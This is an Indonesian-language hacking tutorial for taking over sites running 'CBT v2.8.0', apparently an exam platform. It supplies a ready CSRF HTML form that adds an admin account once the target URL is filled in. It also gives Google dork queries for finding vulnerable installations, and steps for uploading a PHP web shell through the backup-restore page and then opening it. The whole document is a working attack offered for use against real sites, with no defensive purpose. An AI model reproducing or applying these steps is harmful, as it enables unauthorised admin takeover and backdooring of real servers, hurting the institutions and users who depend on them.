CBT v2.8.0 Add admin dimana bug ini memperlihatkan bagaimana sebuah bug yang bisa menambahkan admin dengan csrf .. bagi kalian yang belum tau apa itu csrf cek disini CSRF
Cara Upload shellnya : Klik pengaturan >> lalu ke Restore&Backup >> Upload shell Kalian >> Lalu Klik buttonnya
<html>
<head></head>
<body>
<form action="localhost/admin/?pg=pengawas" method="post">
<label>nip</label>
<input type="text" name="nip" value="123761717" required="true" />
<br>
<label>nama</label>
<input type="text" name="nama" required="true" />
<br>
<label>username</label>
<input type="text" name="username" required="true" />
<br>
<label>password</label>
<input type="password" name="pass1" required="true" />
<br>
<label>ulang password</label>
<input type="password" name="pass2" required="true" />
<br>
<button type="submit" name="submit">simpan</button>
</form>
</body>
</html>
Pada script diatas adalah CSRF yang menghubungkan ke server target .. yang dimana kita akan membuat suatu admin baru di sisi server ..
kalian simpen dengan bentuk ber extensi .html
Google Dork
- Dork :
"CBT v2.8.0" intitle:login
"Responsive Image" + "Support" intitle:Login
- Shell Backdoor
Step 1
Pada tahap ini kita akan diperlihatkan code seperti ini dimana kita akan ganti / edit sesuai dengan url / web si target contoh
<body>
<form action="localhost/admin/?pg=pengawas" method="post">
Nah pada attribute action kita ganti localhost dengan web target kalian lalu save dan buka file .html di browser kesayangan kalian..
lalu klik simpan.
Jika vuln akan langsung masuk ke dashboard seperti gambar dibawah :
Cara Upload shellnya : Klik pengaturan >> lalu ke Restore&Backup >> Upload shell Kalian >> Lalu Klik buttonnya
Cara manggil shellnya :
contoh : namaweb.com/admin/shellmu.php
atau
namaweb.com/[path]/admin/shellmu.php
Semoga Bermanfaat :D